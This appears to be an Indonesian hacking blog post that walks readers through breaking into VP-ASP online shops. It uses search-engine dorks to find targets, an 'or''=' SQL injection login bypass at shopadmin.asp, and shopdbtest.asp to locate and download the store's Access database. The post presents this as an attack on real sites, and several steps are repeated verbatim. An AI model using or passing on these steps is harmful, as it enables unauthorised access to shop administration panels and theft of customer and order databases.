SQL injection
--------------------1. Buka search engine Favorit anda. Gunakan keyword berikut:
allinurl:shopadmin.asp
atau gunakan:
allinurl:vp-asp
2. Misalnya target adalah www.Peretas77.net, maka kemungkinan URLnya adalah:
www.Peretas77.net/vp-asp dir/shopadmin.asp
atau
www.Peretas77.net/shopadmin.asp
3. Lakukan SQL Injection..
www.Peretas77.net/vp-asp dir/shopadmin.asp
login : 'or''=' atau login : admin passwd : 'or''=' passwd : 'or''='
login : 'or''=' atau login : admin passwd : 'or''=' passwd : 'or''='
4. Jika berhasil, anda akan melihat apa yang anda cari didalamnya ;)
Download database
-----------------------
--------------
1. ketika injection falied maka kita coba download database nya :P~
2. contoh URL target:
2. contoh URL target:
www.Peretas77.net/vp-asp dir/shopdbtest.asp
atau
www.Peretas77.net/shopdbtest.asp
- xDblocation
- xdatabasetype
- xEmail
- xEmailName
- xEmailSubject
- xEmailSystem
- xEmailType
- xOrdernumber
- xDatabase ---> untuk mengetahui nama file *.mdb nya.
- xDblocation ---> untuk mengetahui lokasi file *.mdb nya.
Contohnya :
- xDatabase = shopping200
- xDblocation = shop
Maka apa yang anda cari berada pada:
www.Peretas77.net/shop/shoping200.mdb
- xDblocation ---> untuk mengetahui lokasi file *.mdb nya.
Contohnya :
- xDatabase = shopping200
- xDblocation = shop
Maka apa yang anda cari berada pada:
www.Peretas77.net/shop/shoping200.mdb
Download ajah, lalu buka dengan MS Access. ;)
Youda Sushi Chef
0 komentar:
Posting Komentar